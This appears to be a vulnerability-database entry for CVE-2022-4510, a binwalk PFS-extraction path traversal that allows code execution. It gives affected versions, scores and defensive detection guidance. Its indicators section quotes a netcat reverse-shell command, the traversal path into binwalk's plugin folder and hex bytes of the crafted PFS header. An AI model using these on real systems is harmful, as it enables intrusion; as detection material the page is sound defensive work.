cbcvebase.
CVE-2022-4510
published 2023-01-26

CVE-2022-4510: A path traversal vulnerability was identified in ReFirm Labs binwalk from version 2.1.2b through 2.3.3 included. By crafting a malicious PFS filesystem file…

PriorityP260high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
21.84%
97.3th percentile
A path traversal vulnerability was identified in ReFirm Labs binwalk from version 2.1.2b through 2.3.3 included. By crafting a malicious PFS filesystem file, an attacker can get binwalk's PFS extractor to extract files at arbitrary locations when binwalk is run in extraction mode (-e option). Remote code execution can be achieved by building a PFS filesystem that, upon extraction, would extract a malicious binwalk module into the folder .config/binwalk/plugins. This vulnerability is associated with program files src/binwalk/plugins/unpfs.py. This issue affects binwalk from 2.1.2b through 2.3.3 included.

Affected

7 ranges
VendorProductVersion rangeFixed in
debianbinwalk< binwalk 2.3.4+dfsg1-1 (bookworm)binwalk 2.3.4+dfsg1-1 (bookworm)
microsoftbinwalk>= 0 < 2.3.1+dfsg1-1+deb11u12.3.1+dfsg1-1+deb11u1
microsoftbinwalk>= 0 < 2.3.4+dfsg1-12.3.4+dfsg1-1
microsoftbinwalk>= 0 < 2.3.4+dfsg1-12.3.4+dfsg1-1
microsoftbinwalk>= 0 < 2.3.4+dfsg1-12.3.4+dfsg1-1
microsoftbinwalk2.1.2b – 2.3.3
microsoftbinwalk>= 2.2.0 < 2.3.32.3.3

Detection & IOCsextracted from sources · hover to see the quote

filenamebinwalk_exploit.png
path.config/binwalk/plugins
pathsrc/binwalk/plugins/unpfs.py
path/tmp/.binwalk
commandnc <ip> <port> -e /bin/bash 2>/dev/null &
path../../../.config/binwalk/plugins/binwalk.py
bytes
5046532f302e390000000000000001002e2e2f2e2e2f2e2e2f2e636f6e6669672f62696e77616c6b2f706c7567696e732f62696e77616c6b2e70790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034120000a0000000c100002e
  • Detect malicious PFS filesystem header prepended to a PNG file: look for the magic bytes 'PFS/0.9' (hex: 5046532f302e39) followed by a path traversal sequence targeting .config/binwalk/plugins/
  • Alert on creation of files under .config/binwalk/plugins/ during binwalk extraction (-e), especially Python (.py) files, which indicates path traversal exploitation of CVE-2022-4510
  • Monitor for binwalk spawning outbound nc (netcat) processes with '-e /bin/bash', which is the RCE payload delivered via the malicious plugin
  • Monitor for creation of the sentinel file /tmp/.binwalk, which the exploit uses to track whether the payload has already executed
  • Flag binwalk invocations in extraction mode (-e) on files dropped into monitored directories (e.g. /var/www/pilgrimage.htb/shrunk/) by privileged processes, as this is the trigger path for exploitation
  • ·The vulnerability only triggers when binwalk is run in extraction mode; passive scanning without -e is not exploitable
  • ·Affected version range is 2.1.2b through 2.3.3 inclusive; versions 2.3.4+dfsg1-1 and later are patched

CVSS provenance

nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
osv7.8HIGH
vendor_debian7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.